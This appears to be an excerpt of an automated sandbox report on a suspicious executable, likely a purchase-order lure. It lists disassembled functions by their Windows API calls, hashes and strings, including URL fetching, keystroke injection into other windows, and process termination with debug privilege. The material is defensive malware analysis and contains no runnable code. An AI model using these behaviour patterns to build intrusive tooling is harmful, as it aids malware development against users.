                          • Instruction Fuzzy Hash: B9518B71A00209EFDB20CF24CC55BAA7BB6FF98761F104519FA16D72A0DB70E991EB50
                          APIs
                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F7C182
                          • GetLastError.KERNEL32 ref: 00F7C195
                          • SetEvent.KERNEL32(?), ref: 00F7C1A9
                            • Part of subcall function 00F7C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F7C272
                            • Part of subcall function 00F7C253: GetLastError.KERNEL32 ref: 00F7C322
                            • Part of subcall function 00F7C253: SetEvent.KERNEL32(?), ref: 00F7C336
                            • Part of subcall function 00F7C253: InternetCloseHandle.WININET(00000000), ref: 00F7C341
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                          • String ID:
                          • API String ID: 337547030-0
                          • Opcode ID: 2c9eea7b0a3ed0d9b23392ecc02d1432d7544f58dece9216fcbe06e273561ce0
                          • Instruction ID: 3af6a54b9a0f28bf467c964136ca164996bf000a5dc6170a4b504d11c928f4c0
                          • Opcode Fuzzy Hash: 2c9eea7b0a3ed0d9b23392ecc02d1432d7544f58dece9216fcbe06e273561ce0
                          • Instruction Fuzzy Hash: 5F318B71600605AFDB219FA5DC44A66BBF8FF18310B50842FF95A83621D730E914FBE2
                          APIs
                            • Part of subcall function 00F63A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F63A57
                            • Part of subcall function 00F63A3D: GetCurrentThreadId.KERNEL32 ref: 00F63A5E
                            • Part of subcall function 00F63A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00F625B3), ref: 00F63A65
                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F625BD
                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00F625DB
                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00F625DF
                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F625E9
                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00F62601
                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00F62605
                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F6260F
                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00F62623
                          • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00F62627
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                          • String ID:
                          • API String ID: 2014098862-0
                          • Opcode ID: e30609e5b76d16665fd4a07123da0f3000567d2c1dfd76cb13237541cedf07cf
                          • Instruction ID: 10148c7b361f52244a87b7130d8b21c843387ad90871a76384e7ee624d572aea
                          • Opcode Fuzzy Hash: e30609e5b76d16665fd4a07123da0f3000567d2c1dfd76cb13237541cedf07cf
                          • Instruction Fuzzy Hash: D101D431390614BBFB206769DC8AF593F59DF4EB52F100012F318AF0D1C9F22444EAAA
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00F61449,?,?,00000000), ref: 00F6180C
                          • HeapAlloc.KERNEL32(00000000,?,00F61449,?,?,00000000), ref: 00F61813
                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00F61449,?,?,00000000), ref: 00F61828
                          • GetCurrentProcess.KERNEL32(?,00000000,?,00F61449,?,?,00000000), ref: 00F61830
                          • DuplicateHandle.KERNEL32(00000000,?,00F61449,?,?,00000000), ref: 00F61833
                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00F61449,?,?,00000000), ref: 00F61843
                          • GetCurrentProcess.KERNEL32(00F61449,00000000,?,00F61449,?,?,00000000), ref: 00F6184B
                          • DuplicateHandle.KERNEL32(00000000,?,00F61449,?,?,00000000), ref: 00F6184E
                          • CreateThread.KERNEL32(00000000,00000000,00F61874,00000000,00000000,00000000), ref: 00F61868
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                          • String ID:
                          • API String ID: 1957940570-0
                          • Opcode ID: 7d63b7a63fe9bdbbd43bab4b5bc6232fb06bd9a63ca9ca4800ca16f23bbc2460
                          • Instruction ID: dfb7c76102465e874750a720213c0e1c8deab3020be36b6b3b66f2557a08d2f6
                          • Opcode Fuzzy Hash: 7d63b7a63fe9bdbbd43bab4b5bc6232fb06bd9a63ca9ca4800ca16f23bbc2460
                          • Instruction Fuzzy Hash: 2901BBB5640308BFE710ABB5DD4EF6B3BACEB89B11F404412FA05DB1A2CA709840DB74
                          APIs
                            • Part of subcall function 00F6D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00F6D501
                            • Part of subcall function 00F6D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00F6D50F
                            • Part of subcall function 00F6D4DC: CloseHandle.KERNEL32(00000000), ref: 00F6D5DC
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F8A16D
                          • GetLastError.KERNEL32 ref: 00F8A180
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F8A1B3
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00F8A268
                          • GetLastError.KERNEL32(00000000), ref: 00F8A273
                          • CloseHandle.KERNEL32(00000000), ref: 00F8A2C4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                          • String ID: SeDebugPrivilege
                          • API String ID: 2533919879-2896544425
                          • Opcode ID: f355f5f720a42cfaeb346c64a8504bbbe21f4089264e695493f7f5af364b05f3
                          • Instruction ID: e221717c0f8bf8a44195366854df47ebeb5d08f52ca0b9b36ebc56d3a8fb367f
                          • Opcode Fuzzy Hash: f355f5f720a42cfaeb346c64a8504bbbe21f4089264e695493f7f5af364b05f3
                          • Instruction Fuzzy Hash: 2E619E716046429FE720EF18C894F55BBE1EF44318F18848DE4668B7A3C776EC45EB92
                          APIs
                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00F93925
                          • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00F9393A
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00F93954
                          • _wcslen.LIBCMT ref: 00F93999
                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 00F939C6
                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00F939F4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessageSend$Window_wcslen
                          • String ID: SysListView32
                          • API String ID: 2147712094-78025650
                          • Opcode ID: a5342b126f550b60bba313f88bd9a69fbefa36b424ecbaee7ca483d5ca08974c
                          • Instruction ID: 27b7d1a03555cb59c47f8d9d881b9e8f87f86ba1aa744f7fddfb23d85a902168
                          • Opcode Fuzzy Hash: a5342b126f550b60bba313f88bd9a69fbefa36b424ecbaee7ca483d5ca08974c
                          • Instruction Fuzzy Hash: 08417472A00219ABEF219F64CC45BEA7BA9EF08360F100526F958E7281D7759D94EB90
                          APIs
                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F6BCFD
                          • IsMenu.USER32(00000000), ref: 00F6BD1D
                          • CreatePopupMenu.USER32 ref: 00F6BD53
                          • GetMenuItemCount.USER32(01245730), ref: 00F6BDA4
                          • InsertMenuItemW.USER32(01245730,?,00000001,00000030), ref: 00F6BDCC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Menu$Item$CountCreateInfoInsertPopup
                          • String ID: 0$2
                          • API String ID: 93392585-3793063076
                          • Opcode ID: 0bd35450757b369e095ced8e975eb4b5c08589de2e25e678e3729751fa5b2e6a
                          • Instruction ID: 6280543ac61a17d1cc84c97129280cf9cfa1a1544cecd6436e5b90a271cc6d64
                          • Opcode Fuzzy Hash: 0bd35450757b369e095ced8e975eb4b5c08589de2e25e678e3729751fa5b2e6a
                          • Instruction Fuzzy Hash: 7A51A170A002099BDF20CFA8D888BAEBBF8BF45324F14425AE451DB291D7749985EB61
                          APIs
                          • LoadIconW.USER32(00000000,00007F03), ref: 00F6C913
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: IconLoad
                          • String ID: blank$info$question$stop$warning
                          • API String ID: 2457776203-404129466
                          • Opcode ID: c63710881dbaf990f6fbb021757839ba525e704773511478a2f80581007a247e
                          • Instruction ID: cb755687dc835c02b4e9e48d2ae97efcc33b031cfb6538785d0c943a014bfc9d
                          • Opcode Fuzzy Hash: c63710881dbaf990f6fbb021757839ba525e704773511478a2f80581007a247e
                          • Instruction Fuzzy Hash: 73110D32A89307BAE7059B54AC83EBA7B9CDF15764B10042FF584E6182DBB4AD0076E5
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: _wcslen$LocalTime
                          • String ID:
                          • API String ID: 952045576-0
                          • Opcode ID: f9c6f9025bfe96ae656bdd10d7f3742d60c4d99f271089de8d822676e7fad97e
                          • Instruction ID: de91c7d899d71c0afdd9f303d2c9c61ae41dd4b5e70fd6ed381ca54632f9e436
                          • Opcode Fuzzy Hash: f9c6f9025bfe96ae656bdd10d7f3742d60c4d99f271089de8d822676e7fad97e
                          • Instruction Fuzzy Hash: 1541D466C10228B5CB11EBF4DC8A9CFB7A8AF45310F508466F518E3162FB78E245D3E5
                          APIs
                          • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00F5682C,00000004,00000000,00000000), ref: 00F1F953
                          • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00F5682C,00000004,00000000,00000000), ref: 00F5F3D1
                          • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00F5682C,00000004,00000000,00000000), ref: 00F5F454
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ShowWindow
                          • String ID:
                          • API String ID: 1268545403-0
                          • Opcode ID: 5d03362ceaf0c7078a300d3da233aa96e3b3e1c3c3dc3101206d98661dc524c0
                          • Instruction ID: ba05c87f9a37c38d54736d2e2c77941ba20a8615409c579b7f3a6710e48d73d5
                          • Opcode Fuzzy Hash: 5d03362ceaf0c7078a300d3da233aa96e3b3e1c3c3dc3101206d98661dc524c0
                          • Instruction Fuzzy Hash: A7418E32908640BBD734AB39CC887AA7B92BB46330FD8403DE58752560C63198CDFB51
                          APIs
                          • DeleteObject.GDI32(00000000), ref: 00F92D1B
                          • GetDC.USER32(00000000), ref: 00F92D23
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F92D2E
                          • ReleaseDC.USER32(00000000,00000000), ref: 00F92D3A
                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00F92D76
                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00F92D87
                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00F95A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00F92DC2
                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00F92DE1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                          • String ID:
                          • API String ID: 3864802216-0
                          • Opcode ID: 2652a4f73a0c7df84ac0c876387ee6fd7bfbc3464fe9db3aab9e5cc931e50ef0
                          • Instruction ID: eb4c69ae2fc8ab3863ba1a48ffda98285eb17382866f1e7b323a6d1facdb3ec4
                          • Opcode Fuzzy Hash: 2652a4f73a0c7df84ac0c876387ee6fd7bfbc3464fe9db3aab9e5cc931e50ef0
                          • Instruction Fuzzy Hash: 1D316B72201214BBEF218F548C8AFEB3BA9EF09725F044056FE089A291C6759C51DBA4
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: _memcmp
                          • String ID:
                          • API String ID: 2931989736-0
                          • Opcode ID: 696702909648c218211d0fe10d9d4d5a8e8d6e809bbbca5ce5ef55e71e0f1374
                          • Instruction ID: aac7f43bc837b07fe0d0cd91aa03bc08aa00489d7f06c2e1d9d6fe098569c3e1
                          • Opcode Fuzzy Hash: 696702909648c218211d0fe10d9d4d5a8e8d6e809bbbca5ce5ef55e71e0f1374
                          • Instruction Fuzzy Hash: AC21CC62A4091977E6149510DD82FFA335DBF30BA4F444020FD05FA541F726EE24F6AA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID:
                          • String ID: NULL Pointer assignment$Not an Object type
                          • API String ID: 0-572801152
                          • Opcode ID: dbe8d967f683a9a59989c17fbe2e6c4263d6461b97ef2d5ab08ac6e0d1dd9f43
                          • Instruction ID: d4f153b3a7df9d27b654c6e72a732e3a1efb058d7b6d0cc272783df0c7271f83
                          • Opcode Fuzzy Hash: dbe8d967f683a9a59989c17fbe2e6c4263d6461b97ef2d5ab08ac6e0d1dd9f43
                          • Instruction Fuzzy Hash: 84D1DF71E0060AAFDF10EFA8C885BEEB7B5BF48754F148069E915AB280E770DD45DB90
                          APIs
                          • GetCPInfo.KERNEL32(?,?), ref: 00F415CE
                          • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00F41651
                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F416E4
                          • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00F416FB
                            • Part of subcall function 00F33820: RtlAllocateHeap.NTDLL(00000000,?,00FD1444,?,00F1FDF5,?,?,00F0A976,00000010,00FD1440,00F013FC,?,00F013C6,?,00F01129), ref: 00F33852
                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F41777
                          • __freea.LIBCMT ref: 00F417A2
                          • __freea.LIBCMT ref: 00F417AE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                          • String ID:
                          • API String ID: 2829977744-0
                          • Opcode ID: 3d5af4992e744735f0920296e81af03305d9034254e2b4875c7cf22ae6875f30
                          • Instruction ID: 367c485d6cda0aeeda45ede02fb25935f141650ce668a6fd5abf733193033587
                          • Opcode Fuzzy Hash: 3d5af4992e744735f0920296e81af03305d9034254e2b4875c7cf22ae6875f30
                          • Instruction Fuzzy Hash: 1491A272E102169ADB248F64CC81AEE7FB5BF49760F184659EC05E7141EB35DCC4EBA0
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Variant$ClearInit
                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                          • API String ID: 2610073882-625585964
                          • Opcode ID: cd777b8364d5275c5c4a554f7f4e7abc0f27ea2cd655719631d9fbce74e781f6
                          • Instruction ID: 3b3a37d83f26d48b96ba0d26ce474adccb6a459fcebe586fe3d44274e517e747
                          • Opcode Fuzzy Hash: cd777b8364d5275c5c4a554f7f4e7abc0f27ea2cd655719631d9fbce74e781f6
                          • Instruction Fuzzy Hash: 94917F71E0021AABDF20DFA5C845FEEBBB8EF45720F108559F505AB280D774A945DFA0
                          APIs
                          • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00F7125C
                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00F71284
                          • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00F712A8
                          • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00F712D8
                          • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00F7135F
                          • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00F713C4
                          • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00F71430
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ArraySafe$Data$Access$UnaccessVartype
                          • String ID:
                          • API String ID: 2550207440-0
                          • Opcode ID: 9fb27e4a463972ee434c3ebb0326d35d336fb7c7d3126e2d9168847778c003b6
                          • Instruction ID: 1ef54351cd1c2e7df754e462b4cb6b633ad0b47c830d34ae29426657d9d88b99
                          • Opcode Fuzzy Hash: 9fb27e4a463972ee434c3ebb0326d35d336fb7c7d3126e2d9168847778c003b6
                          • Instruction Fuzzy Hash: 1F910771E002099FDB00DF9CD884BBE77B5FF45325F14802AE944E7292D778A949EB92
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ObjectSelect$BeginCreatePath
                          • String ID:
                          • API String ID: 3225163088-0
                          • Opcode ID: 16a203455bc64af02e80ac4b2f938dff54687a40ef001ebca6e393d329ace161
                          • Instruction ID: f19e5eff9c41f294b319fa858a5a08d4e27b74883a490a19cbd2cca47edc0de9
                          • Opcode Fuzzy Hash: 16a203455bc64af02e80ac4b2f938dff54687a40ef001ebca6e393d329ace161
                          • Instruction Fuzzy Hash: D3913B71D04219EFCB11CFA9CC84AEEBBB9FF49320F148055E915B7251D378A981EBA0
                          APIs
                          • VariantInit.OLEAUT32(?), ref: 00F8396B
                          • CharUpperBuffW.USER32(?,?), ref: 00F83A7A
                          • _wcslen.LIBCMT ref: 00F83A8A
                          • VariantClear.OLEAUT32(?), ref: 00F83C1F
                            • Part of subcall function 00F70CDF: VariantInit.OLEAUT32(00000000), ref: 00F70D1F
                            • Part of subcall function 00F70CDF: VariantCopy.OLEAUT32(?,?), ref: 00F70D28
                            • Part of subcall function 00F70CDF: VariantClear.OLEAUT32(?), ref: 00F70D34
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
